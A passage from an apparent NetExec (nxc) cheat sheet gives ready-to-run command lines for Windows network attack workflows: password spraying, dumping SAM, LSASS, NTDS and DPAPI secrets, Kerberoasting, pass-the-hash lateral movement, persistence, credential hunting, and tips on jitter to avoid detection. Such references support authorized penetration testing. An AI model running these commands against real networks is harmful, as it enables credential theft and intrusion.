192.168.1.10 -u admin -p pass -M get_netconnections # Network connections\nnxc wmi 192.168.1.10 -u admin -p pass -M rdp -o ACTION=enable # Enable RDP\nnxc wmi 192.168.1.10 -u admin -p pass -M rdp -o ACTION=disable # Disable RDP\n```\n\n---\n\n## General Flags & Options\n\n### Threading & Performance\n```bash\n-t 256 # Number of threads (default: 256)\n--timeout 10 # Connection timeout in seconds\n--jitter 5 # Random delay between requests (seconds)\n```\n\n### Output & Logging\n```bash\n--verbose # Verbose output\n--debug # Debug mode\n--log output.log # Save output to file\n--no-progress # Disable progress bar\n```\n\n### DNS Options\n```bash\n-6 # Force IPv6\n--dns-server 8.8.8.8 # Custom DNS server\n--dns-tcp # Use TCP for DNS queries\n--dns-timeout 3 # DNS timeout in seconds\n```\n\n### Credential Database\n```bash\n-id 1 # Use credential ID from database\n-id 1 2 3 # Use multiple credential IDs\n```\n\n### Server Options\n```bash\n--server https # Use HTTPS server (default)\n--server http # Use HTTP server\n--server-host 0.0.0.0 # Bind server to IP\n--server-port 8000 # Server port\n--connectback-host IP # Connectback IP for remote system\n```\n\n### Database\n```bash\ncmedb # Access NXC database\nexport smb # Export SMB results\n```\n\n### Modules\n```bash\nnxc smb -L # List all SMB modules\nnxc smb -M --options # Show module options\n```\n\n---\n\n## Common Attack Workflows\n\n### 1. Initial Enumeration\n```bash\n# Find hosts and check SMB signing\nnxc smb 192.168.1.0/24 --gen-relay-list relay.txt\n\n# Anonymous/Guest enumeration\nnxc smb 192.168.1.0/24 -u '' -p ''\nnxc smb 192.168.1.0/24 -u 'guest' -p ''\n\n# Check multiple protocols\nnxc smb 192.168.1.0/24\nnxc rdp 192.168.1.0/24 -u '' -p ''\nnxc winrm 192.168.1.0/24 -u '' -p ''\n```\n\n### 2. Password Spraying\n```bash\n# Single password spray (safe)\nnxc smb targets.txt -u users.txt -p 'Winter2024!' -d DOMAIN --continue-on-success\n\n# With fail limits\nnxc smb targets.txt -u users.txt -p passwords.txt --ufail-limit 3 --fail-limit 5\n\n# Check valid creds across multiple protocols\nnxc smb 192.168.1.10 -u admin -p pass\nnxc winrm 192.168.1.10 -u admin -p pass\nnxc mssql 192.168.1.10 -u admin -p pass\nnxc rdp 192.168.1.10 -u admin -p pass\n```\n\n### 3. Credential Dumping\n```bash\n# Local SAM\nnxc smb 192.168.1.10 -u admin -p pass --sam\n\n# LSASS memory\nnxc smb 192.168.1.10 -u admin -p pass -M lsassy\nnxc smb 192.168.1.10 -u admin -p pass -M nanodump\n\n# Domain Controller NTDS\nnxc smb dc01.domain.local -u admin -p pass --ntds\nnxc smb dc01.domain.local -u admin -p pass --ntds --enabled\n\n# DPAPI\nnxc smb 192.168.1.10 -u admin -p pass --dpapi cookies\n```\n\n### 4. Domain Enumeration\n```bash\n# Users and groups\nnxc ldap dc01.domain.local -u user -p pass --users --groups\n\n# Kerberoastable accounts\nnxc ldap dc01.domain.local -u user -p pass --kerberoasting kerberoast.txt\n\n# ASREProastable accounts\nnxc ldap dc01.domain.local -u user -p pass --asreproast asrep.txt\n\n# Bloodhound data\nnxc ldap dc01.domain.local -u user -p pass --bloodhound -c All\n\n# Find vulnerabilities\nnxc ldap dc01.domain.local -u user -p pass -M adcs\nnxc ldap dc01.domain.local -u user -p pass -M laps\n```\n\n### 5. Lateral Movement\n```bash\n# Pass-the-Hash\nnxc smb targets.txt -u admin -H -x \"hostname\"\n\n# Execute on multiple targets\nnxc smb targets.txt -u admin -p pass -x \"whoami\"\nnxc winrm targets.txt -u admin -p pass -x \"ipconfig\"\n\n# Spray hashes\nnxc smb targets.txt -u users.txt -H hashes.txt --continue-on-success\n```\n\n### 6. Post-Exploitation\n```bash\n# Persistence\nnxc smb 192.168.1.10 -u admin -p pass -M rdp -o ACTION=enable\nnxc smb 192.168.1.10 -u admin -p pass -M wdigest -o ACTION=enable\n\n# Credential hunting\nnxc smb 192.168.1.10 -u admin -p pass -M spider_plus\nnxc smb 192.168.1.10 -u admin -p pass -M gpp_password\nnxc smb 192.168.1.10 -u admin -p pass -M keepass_discover\n\n# Application credentials\nnxc smb 192.168.1.10 -u admin -p pass -M putty\nnxc smb 192.168.1.10 -u admin -p pass -M winscp\nnxc smb 192.168.1.10 -u admin -p pass -M wifi\n```\n\n---\n\n## Tips & Best Practices\n\n- Use `--continue-on-success` for password spraying to find all valid credentials\n- Use `--no-bruteforce` to stop after first valid credential per host (avoid lockouts)\n- Add `--jitter` to introduce random delays and avoid detection\n- Use `--ufail-limit` and `--fail-limit` to prevent account lockouts\n- Check SMB signing with basic scan before relay attacks\n- Use LDAP for domain enumeration (less noisy than SMB)\n- Pass-the-Hash only needs NTLM hash (not LM)\n- Always specify `-d DOMAIN` or `--local-auth` explicitly\n- Use `cmedb` to review all findings in the database\n- Module options: `-M module_name -o OPTION=value`\n- Rate limit yourself to avoid account lockouts and detection\n- Use `--no-progress` when logging output to files\n- Test authentication across multiple protocols (SMB, WinRM, RDP, MSSQL)\n\n---\n\n## Resources\n\n- **GitHub**: https://github.com/Pennyw0rth/NetExec\n- **Wiki**: https://www.netexec.wiki/\n- **Modules**: https://www.netexec.wiki/getting-started/using-modules", "creation_timestamp": "2026-05-26T06:17:22.000000Z"}